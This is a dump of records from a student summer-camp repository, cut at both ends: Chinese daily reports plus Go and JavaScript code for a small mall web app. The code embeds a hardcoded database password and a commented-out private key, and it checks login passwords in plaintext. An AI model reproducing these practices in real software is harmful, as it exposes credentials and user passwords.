接口测试是用来检查各个组件的接口的测试,接口测试主要检查外部系统与系统之间以及各个子系统之间的交互点,测试的重点在数据的传递上,按约定的格式(接口)给待测软件传入某种数据,之后检查接口给的返回值是否正确\n3. 接口测试流程主要是执行+断言\n 断言如下内容:\n * 服务器状态,返回的代码,比如200,如果使用工具测试,就由工具就判断了\n * 数据错误:通过正则或者其他的手段来处理\n * 超时错误\n \n### 建立一个工程\n1. project\n * controller(与前端交互,处理前端传入的数据,路由处理)\n *user.go*\n * model(编写程序应有的功能,与数据库建立连接)\n *user.go*\n * view\n *user.go*\n * main.go(创建web serve和路由)\n2. init函数(会在每个包完成初始化后自动执行,并且执行优先级比main函数高)\n* 通常被用来:\n * 对变量进行初始化\n * 检查/修复程序的状态\n * 注册\n * 运行一次计算\n\n### 利用框架来实现登陆\n1. echo.Context里面包含很多很多东西,嗯\n2. 在response时发送json格式更方便前端,当传输数据时只是一个状态时,可以用“status-true/false”来传输\n3. func(c echo.Context)格式不可以改变\n\n\n明日继续\nto be continued\n\n\n\n\n\n" }, { "alpha_fraction": 0.5647059082984924, "alphanum_fraction": 0.6176470518112183, "avg_line_length": 10.333333015441895, "blob_id": "7b71cb93e988a1add65f0d0678e559496eb28988", "content_id": "639e2caa6ec607cb578f27b91f95efbe89f1a4d0", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 327, "license_type": "no_license", "max_line_length": 24, "num_lines": 15, "path": "/yixiaoer/日报/7.19.md", "repo_name": "tofar/bingyan-summer-camp2018", "src_encoding": "UTF-8", "text": "# 7.19日报\n\n## 今日计划\n* 完成基本功能的后台部分\n\n## 完成情况\n### 遇到的一些情况\n1. 403的解决\n * user 【用户名】 【**用户组**】\n2. openSSL\n * 公钥和私钥生成,进行非对称加密\n 3. 用不可逆加密来进行登陆与注册(比对法)\n \n明日继续\nto be continued😶\n" }, { "alpha_fraction": 0.6739130616188049, "alphanum_fraction": 0.760869562625885, "avg_line_length": 8.399999618530273, "blob_id": "cb491b12daa058bfff330f7e236fa6c409bc358b", "content_id": "638a81375b6ff4b7bd99c16848d7fd6fe6e73dcc", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 92, "license_type": "no_license", "max_line_length": 32, "num_lines": 5, "path": "/Old-Li883/日报/7.21.md", "repo_name": "tofar/bingyan-summer-camp2018", "src_encoding": "UTF-8", "text": "# 7.21\n\n学习js\n\n明日计划:;理解ajax,看fetch文档,尝试着画一些h5页面" }, { "alpha_fraction": 0.6571428775787354, "alphanum_fraction": 0.7428571581840515, "avg_line_length": 4.142857074737549, "blob_id": "a9ffd55aeb305186f9e27e57638ffcb3ba0f2aa0", "content_id": "454606442a2aa26d09f692eb2b72b9c4dc454b8f", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 61, "license_type": "no_license", "max_line_length": 10, "num_lines": 7, "path": "/Old-Li883/日报/7.14.md", "repo_name": "tofar/bingyan-summer-camp2018", "src_encoding": "UTF-8", "text": "# 7.14\n\n学习json\n\npython代码规范\n\n第一个后台函数" }, { "alpha_fraction": 0.7400000095367432, "alphanum_fraction": 0.7400000095367432, "avg_line_length": 41.92856979370117, "blob_id": "2540bed8985a00ba8841ee98c084e1d4026fed5f", "content_id": "f54942c59dcf02bbd2c91036310ca05c72831f9f", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Go", "length_bytes": 600, "license_type": "no_license", "max_line_length": 88, "num_lines": 14, "path": "/jackwener/server/mall/routers/goods.go", "repo_name": "tofar/bingyan-summer-camp2018", "src_encoding": "UTF-8", "text": "package routers\n\nimport (\n\t\"mall/controllers\"\n\t\"github.com/astaxie/beego\"\n)\nfunc init() {\n\tbeego.Router(\"/api/goods/kind\", &controllers.MainController{}, \"post:KindSearch\")\n\tbeego.Router(\"/api/goods/local\", &controllers.MainController{}, \"post:LocalSearch\")\n\tbeego.Router(\"/api/goods/:good\", &controllers.MainController{}, \"get:Goods\")\n\tbeego.Router(\"/api/goods/:good/picture\", &controllers.MainController{}, \"post:Picture\")\n\tbeego.Router(\"/api/goods/recent\", &controllers.MainController{}, \"get:RecentSearch\")\n\tbeego.Router(\"/api/goods/popular\", &controllers.MainController{}, \"get:PopularSearch\")\n}" }, { "alpha_fraction": 0.37142857909202576, "alphanum_fraction": 0.4571428596973419, "avg_line_length": 5.800000190734863, "blob_id": "a945726d3f771993a9ebdb0e6e5154a9c3caa68d", "content_id": "c3c3c835c58a4c1ee05c993d2798d40c9f7a45e3", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 61, "license_type": "no_license", "max_line_length": 14, "num_lines": 5, "path": "/Shixiaoyanger/日报/7.15.md", "repo_name": "tofar/bingyan-summer-camp2018", "src_encoding": "UTF-8", "text": "# 7.15日报\n\n放假\n\n装了一天linux。。。。。\n\n" }, { "alpha_fraction": 0.6360673308372498, "alphanum_fraction": 0.6458446383476257, "avg_line_length": 19.46666717529297, "blob_id": "e03608bb2b8c7fa8b66519fd5c95809c1c53a2dd", "content_id": "4f36a6ad25dc558dbf5297230eb1c9e606a0b385", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Go", "length_bytes": 1857, "license_type": "no_license", "max_line_length": 80, "num_lines": 90, "path": "/Shixiaoyanger/market/models/User.go", "repo_name": "tofar/bingyan-summer-camp2018", "src_encoding": "UTF-8", "text": "package models\n\nimport (\n\t\"fmt\"\n\t\"github.com/astaxie/beego/orm\"\n)\nfunc RegisterDB(){\n orm.RegisterDriver(\"mysql\", orm.DRMySQL)\n orm.RegisterDataBase(\"default\", \"mysql\", \"root:123456@/market?charset=utf8\")\n\n orm.RegisterModel(new(User),new(Goods) )\n}\n \n\ntype User struct{\n\tId int64 // `json:\"-\"` \n Username string `json:\"Username\"`\n Password string `json:\"password\"`\n Tel string `json:\"tel\"`\n\tViews int64 `json:\"views\"`\n\t\n}\ntype Users struct{\n\tUser *User\n\n\n}\n//locate User by username\nfunc ReadUser(user *User) error{\n\to := orm.NewOrm()\n\tqs := o.QueryTable(\"user\")\n\terr := qs.Filter(\"username\",user.Username).One(user)\n\treturn err\n\t//err == nil username has existed\n\t//err!= nil .....not exist\n\n}\n\n//注册添加数据成员\nfunc AddUser(user *User) (bool,error){\n\to := orm.NewOrm()\n\terr := ReadUser(user)\n\tif err == nil{\n\t\treturn false, err //username has existed\n\t}\n\tuser.Password = GetDes(user.Password)\n\t_,err =o.Insert(user)\n\tif err != nil{\n\t\treturn false, err //faild to insert\n\t}\n\treturn true, nil\n}\n\nfunc UpdateUser(user *User) error{\n\to := orm.NewOrm()\n\terr := ReadUser(user)\n\tif err != nil{\n\t\treturn err//not exist\n\t}\n\t//num,err1 :=o.Update(&user,\"Tel\",)\n\tnum, err1 := o.QueryTable(\"user\").Update(orm.Params{\n\t\t\"views\": orm.ColValue(orm.ColAdd, 100),\n\t})\n\tfmt.Println(\"num\",num)\n\treturn err1 //update success\n}\n\nfunc IncreaseView(user *User) {\n\to := orm.NewOrm()\n\to.QueryTable(\"user\").Update(orm.Params{\n\t\t\"views\": orm.ColValue(orm.ColAdd, 1),\n\t})\n}\n\n// search User, return info\nfunc FindbyUserame(username string) (bool, User){\n\to :=orm.NewOrm()\n\tvar user User\n\terr := o.QueryTable(\"user\").Filter(\"username\", username).One(&user)\n\treturn err!= orm.ErrNoRows, user\n}\n\nfunc DeleteUser(user *User) error {\n\to := orm.NewOrm()\n\t_,err := o.Delete(user)\n\tif err!= nil{\n\t\treturn err\n\t}\n\treturn nil\n}" }, { "alpha_fraction": 0.5, "alphanum_fraction": 0.6666666865348816, "avg_line_length": 5.333333492279053, "blob_id": "76dcb328c8419b38890497be65e0df954578c364", "content_id": "42a34433b5270c62ef0c8ff1819555748d15748f", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 38, "license_type": "no_license", "max_line_length": 8, "num_lines": 3, "path": "/jackwener/日报/7.25.md", "repo_name": "tofar/bingyan-summer-camp2018", "src_encoding": "UTF-8", "text": "# 7.25日报\n\n继续写前端部分。" }, { "alpha_fraction": 0.7785714268684387, "alphanum_fraction": 0.8357142806053162, "avg_line_length": 45.66666793823242, "blob_id": "94f5c4fb6013a5954d924e2820b279a260e25621", "content_id": "4d43bb2d7c4a5f79d30147f53da820ac0ebe7930", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 382, "license_type": "no_license", "max_line_length": 129, "num_lines": 3, "path": "/jackwener/日报/7.16.md", "repo_name": "tofar/bingyan-summer-camp2018", "src_encoding": "UTF-8", "text": "# 7.16日报\n\n昨晚3点改完代码才睡,早上11.30才起床,下午想了下项目的思路,摸鱼有点严重....太困了,晚上是分享,感觉自己容易浪起来一定要控制自己的感觉,做东西的时候要严肃,脑子要清醒,多喝咖啡和红牛,一定注意不要浪,后面加紧项目的进度,多搜些东西看,多自己解决问题\n" }, { "alpha_fraction": 0.4375848174095154, "alphanum_fraction": 0.4457259178161621, "avg_line_length": 50.73684310913086, "blob_id": "0584b11b7032c73ab1ff68f5d1f7379b7c2a6ca7", "content_id": "e5cab16b98dfd88aa891476c0d1a552526ee53d9", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "JavaScript", "length_bytes": 3046, "license_type": "no_license", "max_line_length": 109, "num_lines": 57, "path": "/Old-Li883/mall/js/registration.js", "repo_name": "tofar/bingyan-summer-camp2018", "src_encoding": "UTF-8", "text": "$(document).ready(function () {\n $('.who').click(function () {\n value = $(\"input:radio[name='who']:checked\").val();//注意作用域的问题,每一个回调函数一个作用域?\n if (value === \"1\") {\n $(\"#div1\").remove();\n $(\"h1\").after(\"<div id='div1'></div>\");\n $(\"div\").append(\"id:<input id='id' type='text' name='id'><br>\");\n $(\"div\").append(\"password:<input id='password' type='password' name='password'><br>\");\n $(\"div\").append(\"rewrite_password:<input id='rpassword' type='password' name='password'><br>\");\n $(\"div\").append(\"email:<input type='text' name='email'><br>\");\n $(\"div\").append(\"name:<input type='text' name='name'><br>\");\n $(\"div\").append(\"addr:<input type='text' name='addr'><br>\");\n $(\"div\").append(\"phone:<input type='text' name='phone'><br>\");\n $('#rpassword').blur(function () {//注意异步加载的问题\n $(\"#message\").remove();\n p1 = $('#password').val();\n p2 = $('#rpassword').val();\n if (p1 !== p2) {\n $(\"#rpassword\").after(\"<p id='message'>two password is not equal</p>\");\n }\n });\n }\n else if (value === \"2\") {\n $(\"#div1\").remove();\n $(\"h1\").after(\"<div id='div1'></div>\");\n $(\"div\").append(\"id:<input id='id' type='text' name='id'><br>\");\n $(\"div\").append(\"password:<input id='password' type='password' name='password'><br>\");\n $(\"div\").append(\"rewrite_password:<input id='rpassword' type='password' name='password'><br>\");\n $(\"div\").append(\"email:<input type='text' name='email'><br>\");\n $(\"div\").append(\"addr:<input type='text' name='addr'><br>\");\n $('#rpassword').blur(function () {//注意异步加载的问题\n $(\"#message\").remove();\n p1 = $('#password').val();\n p2 = $('#rpassword').val();\n if (p1 !== p2) {\n $(\"#rpassword\").after(\"<p id='message'>two password is not equal</p>\");\n }\n });\n }\n else if (value === \"3\") {\n $(\"#div1\").remove();\n $(\"h1\").after(\"<div id='div1'></div>\");\n $(\"div\").append(\"id:<input id='id' type='text' name='id'><br>\");\n $(\"div\").append(\"password:<input id='password' type='password' name='password'><br>\");\n $(\"div\").append(\"rewrite_password:<input id='rpassword' type='password' name='password'><br>\");\n $(\"div\").append(\"email:<input type='text' name='email'><br>\");\n $('#rpassword').blur(function () {//注意异步加载的问题\n $(\"#message\").remove();\n p1 = $('#password').val();\n p2 = $('#rpassword').val();\n if (p1 !== p2) {\n $(\"#rpassword\").after(\"<p id='message'>two password is not equal</p>\");\n }\n });\n }\n });\n});" }, { "alpha_fraction": 0.4962962865829468, "alphanum_fraction": 0.7111111283302307, "avg_line_length": 10.25, "blob_id": "945ece98baa46bb01f18ce41818d12f929e759b8", "content_id": "77ee9f11cf5f501bebd460add9b60dae271bfada", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 185, "license_type": "no_license", "max_line_length": 48, "num_lines": 12, "path": "/Old-Li883/日报/7.8.md", "repo_name": "tofar/bingyan-summer-camp2018", "src_encoding": "UTF-8", "text": "<<<<<<< HEAD\n# 7.8\n\n学习sqlalchemy并看了个相关示例\n\n明日计划:\n\n自己动手做一个相关的sqlalchemy\n=======\ndfjasd\n\n>>>>>>> a33ae2d7f6861a6b369cd48c770f99391491ba03\n" }, { "alpha_fraction": 0.71875, "alphanum_fraction": 0.7195723652839661, "avg_line_length": 19.576271057128906, "blob_id": "adc59658718c228c491ddb315e69c83af3a76e36", "content_id": "de49c12a23b49a92b65f327836ea499990787306", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Go", "length_bytes": 1228, "license_type": "no_license", "max_line_length": 50, "num_lines": 59, "path": "/yixiaoer/server/src/project2/controller/commodity.go", "repo_name": "tofar/bingyan-summer-camp2018", "src_encoding": "UTF-8", "text": "package controller\n\nimport (\n\t\"github.com/labstack/echo\"\n\t\"project/project2/model\"\n\t\"net/http\"\n\t\"fmt\"\n)\n\nfunc ShowCategory(c echo.Context) error {\n\tCommodityCategory := map[string]string{\n\t\t\"类别\": \"\",\n\t}\n\tc.Bind(&CommodityCategory)\n\tfmt.Println(CommodityCategory)\n\tvar commodity []model.Commodity\n\tcommodity = model.ShowCategory(CommodityCategory)\n\tu := &commodity\n\tfmt.Println(commodity)\n\treturn c.JSON(http.StatusOK, u)\n}\n\nfunc ShowLocation(c echo.Context) error {\n\tCommodityCategory := map[string]string{\n\t\t\"地域\": \"\",\n\t}\n\tc.Bind(&CommodityCategory)\n\tvar commodity []model.Commodity\n\tcommodity = model.ShowLocation(CommodityCategory)\n\tu := &commodity\n\treturn c.JSON(http.StatusOK, u)\n}\n\nfunc CommodityInfo(c echo.Context) error {\n\tcommodityInfo := map[string]string{\n\t\t\"id\": \"\",\n\t\t//\"图片\":\"\",\n\t}\n\tc.Bind(&commodityInfo)\n\n\tvar commodity model.Commodity\n\tcommodity = model.CommodityInfo(commodityInfo)\n\tu := &commodity\n\tfmt.Println(commodity)\n\treturn c.JSON(http.StatusOK, u)\n}\n\nfunc PopluarRank(c echo.Context) error{\n\tuserInfo := map[string]string{\n\t\t\"hits\": \"yes\",\n\t}\n\tc.Bind(&userInfo)\n\n\tvar commodity []model.Commodity\n\n\tcommodity=model.PopularRank(userInfo)\n\tu := &commodity\n\treturn c.JSON(http.StatusOK, u)\n}\n\n\n" }, { "alpha_fraction": 0.27272728085517883, "alphanum_fraction": 0.5454545617103577, "avg_line_length": 3, "blob_id": "bb4aad643e9d8352cf7a9f5068c7a69a5a54be14", "content_id": "56e9c3e2560f20e5b2f0c721290198fa2eee6b8e", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 17, "license_type": "no_license", "max_line_length": 6, "num_lines": 3, "path": "/Old-Li883/日报/7.24.md", "repo_name": "tofar/bingyan-summer-camp2018", "src_encoding": "UTF-8", "text": "# 7.24\n\n写前段" }, { "alpha_fraction": 0.5862069129943848, "alphanum_fraction": 0.6896551847457886, "avg_line_length": 8.666666984558105, "blob_id": "c81c58d035cf14cf330073e9326ea908464c612b", "content_id": "d7371a6c1b82b6cb8a64ce9bf6daf90abd083a49", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 45, "license_type": "no_license", "max_line_length": 20, "num_lines": 3, "path": "/jackwener/日报/7.24.md", "repo_name": "tofar/bingyan-summer-camp2018", "src_encoding": "UTF-8", "text": "# 7.24\n\n配置nginx,学习juery,写前端。\n" }, { "alpha_fraction": 0.7441860437393188, "alphanum_fraction": 0.7558139562606812, "avg_line_length": 13.333333015441895, "blob_id": "39ec5a0f524b2d8a4b5eacd821d98ce5b61377d0", "content_id": "c48dd73e4f8939910c64aa6e81d70cffde66acd5", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 428, "license_type": "no_license", "max_line_length": 110, "num_lines": 18, "path": "/yixiaoer/日报/7.16.md", "repo_name": "tofar/bingyan-summer-camp2018", "src_encoding": "UTF-8", "text": "# 7.16日报\n\n## 今日计划\n* 实现成员申请组别管理员的同意\n* 了解postman的使用\n\n## 完成情况\n###\n* 当出现“Too many arguments to return Reports incompatible types.”注意检查func(xxx xxx)后面有没有接xxx(func要return xxx的时候)\n* golang中不允许循环导包\n\n\n管理员如何收到要更改的消息➡️可以通过状态\n路由emmm\n### 关于postman\n\n明日继续\nto be continued\n" }, { "alpha_fraction": 0.648777186870575, "alphanum_fraction": 0.65794837474823, "avg_line_length": 25.29464340209961, "blob_id": "843c2e3fd67e3c7a41fd611417a7d5ac38d9d79b", "content_id": "b829b0305537b00647e0d67f4c3f815869420686", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Go", "length_bytes": 3114, "license_type": "no_license", "max_line_length": 90, "num_lines": 112, "path": "/yixiaoer/server/src/project2/model/commodity.go", "repo_name": "tofar/bingyan-summer-camp2018", "src_encoding": "UTF-8", "text": "package model\n\nimport (\n\t\"gopkg.in/mgo.v2\"\n\t\"gopkg.in/mgo.v2/bson\"\n\t\"fmt\"\n)\n\ntype Commodity struct {\n\tId bson.ObjectId ` json:\"id\" form:\"id\" query:\"id\" bson:\"_id\"`\n\tTitle string `json:\"title\" form:\"title\" query:\"title\" bson:\"title\"`\n\tInfo string `json:\"info\" form:\"info\" query:\"info\" bson:\"info\"`\n\tPrice int `json:\"price\" form:\"price\" query:\"price\" bson:\"price\"`\n\tPicture string `json:\"picture\" form:\"picture\" query:\"picture\" bson:\"picture\"`\n\tCategory string `json:\"category\" form:\"category\" query:\"category\" bson:\"category\"`\n\tLocation string `json:\"location\" form:\"location\" query:\"location\" bson:\"location\"`\n\tHits int `json:\"hits\" form:\"hits\" query:\"hits\" bson:\"hits\"`\n}\n\n//按类别查询\nfunc ShowCategory(u map[string]string) []Commodity {\n\tsession, err := mgo.Dial(\"localhost:27017\")\n\tif err != nil {\n\t\tpanic(err)\n\t}\n\tdefer session.Close()\n\tsession.SetMode(mgo.Monotonic, true) //连接数据库\n\n\tc := session.DB(\"商城\").C(\"商品\")\n\n\tvar commodities []Commodity//用切片来存放所有查询结果\n\terr = c.Find(bson.M{\"category\": u[\"category\"]}).All(&commodities)\n\tfmt.Println(\"test\")\n\tfmt.Println(err)\n\tfmt.Println(commodities)\n\tfmt.Println(\"test over\")\n\treturn commodities\n}\n\n//按地域查询\nfunc ShowLocation(u map[string]string) []Commodity {\n\tsession, err := mgo.Dial(\"localhost:27017\")\n\tif err != nil {\n\t\tpanic(err)\n\t}\n\tdefer session.Close()\n\tsession.SetMode(mgo.Monotonic, true) //连接数据库\n\n\tc := session.DB(\"商城\").C(\"商品\")\n\n\t//var commodities []Commodity //用切片来存放所有查询结果\n\tvar commodities []Commodity\n\tc.Find(bson.M{\"location\": u[\"location\"]}).All(&commodities)\n\treturn commodities\n}\n\n//商品页面\n\nfunc CommodityInfo(u map[string]string) Commodity {\n\tsession, err := mgo.Dial(\"localhost:27017\")\n\tif err != nil {\n\t\tpanic(err)\n\t}\n\tdefer session.Close()\n\n\t// Optional. Switch the session to a monotonic behavior.\n\tsession.SetMode(mgo.Monotonic, true)\n\tc := session.DB(\"商城\").C(\"商品\")\n\n\tvar commodity Commodity\n\tc.Find(bson.M{\"_id\": bson.ObjectIdHex(u[\"id\"])}).One(&commodity)\n\n\t//c.Find(bson.M{\"id\": u[\"id\"]}).One(&commodity)\n\t//c.Find(bson.M{\"图片\": u[\"图片\"]}).One(&commodity)\n\n\treturn commodity\n}\n\n//热度查看\nfunc PopularRank(u map[string]string) []Commodity {\n\tvar commodities []Commodity\n\tif u[\"hits\"] == \"yes\" {\n\t\tsession, err := mgo.Dial(\"localhost:27017\")\n\t\tif err != nil {\n\t\t\tpanic(err)\n\t\t}\n\t\tdefer session.Close()\n\n\t\t// Optional. Switch the session to a monotonic behavior.\n\t\tsession.SetMode(mgo.Monotonic, true)\n\t\tc := session.DB(\"商城\").C(\"商品\")\n\n\t\tc.Find(nil).Sort(\"-hits\").All(&commodities) // 按照点击量升序排列\n\t}\n\treturn commodities\n}\n\nfunc CommodityHits(u map[string]string) {\n\tsession, err := mgo.Dial(\"localhost:27017\")\n\tif err != nil {\n\t\tpanic(err)\n\t}\n\tdefer session.Close()\n\n\t// Optional. Switch the session to a monotonic behavior.\n\tsession.SetMode(mgo.Monotonic, true)\n\tc := session.DB(\"商城\").C(\"商品\")\n\n\tselector := bson.M{\"title\": u[\"title\"]}\n\tdata := bson.M{\"$set\": bson.M{\"hits\": u[\"hits\"]}}\n\tc.Update(selector, data)\n}" }, { "alpha_fraction": 0.6990291476249695, "alphanum_fraction": 0.6990291476249695, "avg_line_length": 11.875, "blob_id": "d8a6795e81e3661f302d05028ca97a47a0dd0432", "content_id": "8e422e24da29943734fe51d55a08a8fa13b58000", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Go", "length_bytes": 103, "license_type": "no_license", "max_line_length": 27, "num_lines": 8, "path": "/jackwener/server/练手/models/json.go", "repo_name": "tofar/bingyan-summer-camp2018", "src_encoding": "UTF-8", "text": "package models\n\nimport \"hello/models/class\"\n\ntype Info struct{\n\tUser []class.User\n\tResult bool\n}\n" }, { "alpha_fraction": 0.774193525314331, "alphanum_fraction": 0.8225806355476379, "avg_line_length": 11.600000381469727, "blob_id": "f0934b1f8e91cc9d54a7665c0800183c3f07525e", "content_id": "cf17c36efccbc88a2ca00c9ef08ed1f7371d6519", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 152, "license_type": "no_license", "max_line_length": 41, "num_lines": 5, "path": "/Old-Li883/日报/7.23.md", "repo_name": "tofar/bingyan-summer-camp2018", "src_encoding": "UTF-8", "text": "# 7.23\n\njs练手,在各位大佬的帮助下进行nginx配置,成功从前段访问了后台,并获取了数据\n\n下一步计划,写前段页面" }, { "alpha_fraction": 0.7816593647003174, "alphanum_fraction": 0.7991266250610352, "avg_line_length": 12.529411315917969, "blob_id": "bb41840803839d579f5e0ba9857420c44aba4146", "content_id": "d40b10220554f8712504317821d32350db879c0a", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 585, "license_type": "no_license", "max_line_length": 73, "num_lines": 17, "path": "/jackwener/日报/7.6.md", "repo_name": "tofar/bingyan-summer-camp2018", "src_encoding": "UTF-8", "text": "# 程序组文杰7.6日报\n\n## 早上\n\n主要是看《Linux内核设计与实现》这本书,想复习一下操作系统的知识,没有复习多少,几个问题纠结了比较久,像优先级nice值和时间片的映射关系等。\n\n## 下午\n\n继续上午的事情了1.5个小时,然后看了一些go语言的知识,做了预备性点工作\n\n## 晚上\n\n主要是把http权威指南第三章看了,看了菜鸟教程上的前端部分\n\n## 总结\n\n对自己的学习效率不满意,今天也算是个试探过程,后面希望能提高效率,理清下学习脉络。" }, { "alpha_fraction": 0.5733598470687866, "alphanum_fraction": 0.5896620154380798, "avg_line_length": 20.32203483581543, "blob_id": "a7de2cf14756dd7bbe0c7789cd223f4b21b9ac97", "content_id": "bf81178d4a184dd1d8a4995dc28ba29c81fc09a5", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Go", "length_bytes": 2757, "license_type": "no_license", "max_line_length": 72, "num_lines": 118, "path": "/yixiaoer/server/src/project2/model/user.go", "repo_name": "tofar/bingyan-summer-camp2018", "src_encoding": "UTF-8", "text": "package model\n\nimport (\n\t\"gopkg.in/mgo.v2\"\n\t\"gopkg.in/mgo.v2/bson\"\n)\n\ntype User struct {\n\tId string `json:\"id\" form:\"id\"query:\"id\"`\n\tPassword string `json:\"password\" form:\"password\"query:\"password\"`\n\tEmail string `json:\"email\" form:\"email\" query:\"email\"`\n\tPhone string `json:\"phone\" form:\"phone\" query:\"phone\"`\n\tName string `json:\"name\" form:\"name\" query:\"name\"`\n\tHits string `json:\"hits\" form:\"hits\" query:\"hits\"`\n}\n\n//var Publickey = `-----BEGIN 公钥-----\n//MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQDS3pFbkT33ioFIh7kFb/zByVnU\n//lQ5OnFvSLYXM42LmzS9ppE5nvk5VBLF1MiwQlHCrM/94cxVQ+3jBZPkrmx8Ulii8\n//9kAXn+YGgpApUYiC/5tRdSY8C4TkqHbJD/wEgweTsD3CRBxSMyfKKRUh4/Wu7Trx\n//FPiBDvurxCqQyC/vpQIDAQAB\n//-----END 公钥-----\n//`\n//\n//var Pirvatekey = `-----BEGIN 私钥-----\n//MIICoTAbBgkqhkiG9w0BBQMwDgQI4TCFXuyfWGUCAggABIICgNemXWIGNtUETmtR\n//vP5QkQ+ItX7DtsX/K3NHLiEaG0IDyoeiBX9nwt9TbQk/erCTBbp4N/YOXYVlMcws\n//FTPhaCIEJqYnM/ZYhLHz0gofEQaFqTvJYe04mF7kY2B1UujjinZhEJMpmuf4kxOw\n//NdD9zCU5/YC00qZlTfdXo11z5e5SF/8bBTCzFnsgoI16SmhHq2NbMsZoRDS7EhDb\n//h+t3UWS/QGk8t5DBc63UTlzxP0yA6Ef1/eMRkgAOfJPP9ED7EHxP81zBLj/U6pC8\n//06lvK/qJOMD+WtwLdP4mNAvyoHAjUvoROtXxTldnoBUaRoO853EuCvzhbm0str63\n//y4khPflzLsPzB3MW1hftjS2cPNjliPntBMdk+sPhDbXAtwrzMn1/4oTtvJU/kKN/\n//Iz22o7a6dtScc9PanS/RIr6AtZBWbP46+dv66yx+4J66Z8V2TnmzVYJIQLt3Y5cj\n//ai7/d0X6WKr1XN0eqFxDwniUgrdNzK9SCi4kd0XypTg9lNQzqF/V9bO5f3oDJzYS\n//2eH/PMgtLGa6H3d7DezQzw89MELVuWvaG8UdsGhhjsAtAWfgOFo2KRBpGAbIZbIp\n//uAXIIUTb6JZT3vozVOsGXOYUEK9J8FNovTUGAXNlZhC5xlyRlezHRd2dKLRpmbHq\n//LDsJJaN6g1q4u1mKBPlZK3oEdAv6kODdkcKaJbbwyAE3KfzOpFrczeequ/5mVLrY\n//8edC4l+IWDoxE/QmgLWkbSkjgQEXnPw3p6xCfyVgSMdDHAn2S2nZm8offeUMZj8R\n//pbwPL3evdevZzaADoABv9OejCpep2nK1/sFMzKUYLxSY3+00/74872Gy49PHbfDi\n//0APM9yg=\n//-----END 私钥-----\n//`\n\nfunc Login(u map[string]string) int8 {\n\tvar i int8\n\tif u [\"name\"] != \"\" && u[\"password\"] != \"\" {\n\n\t\tsession, err := mgo.Dial(\"localhost:27017\")\n\t\tif err != nil {\n\t\t\tpanic(err)\n\t\t}\n\t\tdefer session.Close()\n\t\tsession.SetMode(mgo.Monotonic, true) //连接数据库\n\n\t\tc := session.DB(\"商城\").C(\"用户\")\n\n\t\tvar user1 User\n\t\tvar user2 User\n\t\tc.Find(bson.M{\"name\": u[\"name\"]}).One(&user1) //id由数据库分配,不方便登陆,用name登陆\n\t\tif user1.Name != \"\" { //查找是否存在这个name的用户\n\t\t\tc.Find(bson.M{\"name\": u[\"name\"],\n\t\t\t\t\"password\": u[\"password\"]}).One(&user2)\n\t\t\tif user2.Name != \"\" {\n\t\t\t\ti = 0 //若存在查找是否这个name的用户pw也一致\n\t\t\t} else if user2.Name == \"\" {\n\t\t\t\ti = 1 //密码错误\n\t\t\t}\n\t\t} else if user1.Name == \"\" {\n\t\t\ti = 2 //没有这个name的用户\n\t\t}\n\n\t} else {\n\t\ti = 2\n\t}\n\treturn i\n}\n\nfunc SignUp(u map[string]string) int8 {\n\tvar i int8\n\tprintln(u)\n\tif u[\"password\"] != \"\" && u[\"name\"] != \"\" && u[\"phone\"] != \"\" {\n\n\t\tsession, err := mgo.Dial(\"localhost:27017\")\n\t\tif err != nil {\n\t\t\tpanic(err)\n\t\t}\n\t\tdefer session.Close()\n\t\tsession.SetMode(mgo.Monotonic, true) //连接数据库\n\n\t\tc := session.DB(\"商城\").C(\"用户\")\n\n\t\tvar user User\n\t\tc.Find(bson.M{\"name\": u[\"name\"]}).One(&user)\n\t\tif user.Name == \"\" {\n\t\t\tc.Insert(&u)\n\t\t\ti = 0 //数据库中之前不存在这个name,可以注册\n\t\t} else {\n\t\t\ti = 1 //数据库中已有这个name\n\t\t}\n\t} else {\n\t\ti = 2 //数据不完整\n\t}\n\treturn i\n}\n\nfunc UserInfo(u map[string]string)User{\n\tsession, err := mgo.Dial(\"localhost:27017\")\n\tif err != nil {\n\t\tpanic(err)\n\t}\n\tdefer session.Close()\n\tsession.SetMode(mgo.Monotonic, true) //连接数据库\n\n\tc := session.DB(\"商城\").C(\"用户\")\n\n\tvar user User\n\tc.Find(bson.M{\"name\": u[\"name\"]}).One(&user)\n\treturn user\n}\n\nfunc UserHits(u map[string]string){\n\tsession, err := mgo.Dial(\"localhost:27017\")\n\tif err != nil {\n\t\tpanic(err)\n\t}\n\tdefer session.Close()\n\n\t// Optional. Switch the session to a monotonic behavior.\n\tsession.SetMode(mgo.Monotonic, true)\n\tc := session.DB(\"商城\").C(\"用户\")\n\n\tselector := bson.M{\"name\": u[\"name\"]}\n\tdata := bson.M{\"$set\": bson.M{\"hits\": u[\"hits\"]}}\n\tc.Update(selector, data)\n}" }, { "alpha_fraction": 0.6030569672584534, "alphanum_fraction": 0.6030569672584534, "avg_line_length": 34.3934440612793, "blob_id": "a0ce8e1907e2d491d879f4f8d7b076ca4018ebe2", "content_id": "76ec05f426d4650d237f2924d81761279267f2ae", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2277, "license_type": "no_license", "max_line_length": 83, "num_lines": 61, "path": "/Old-Li883/mall/views/merchant_views.py", 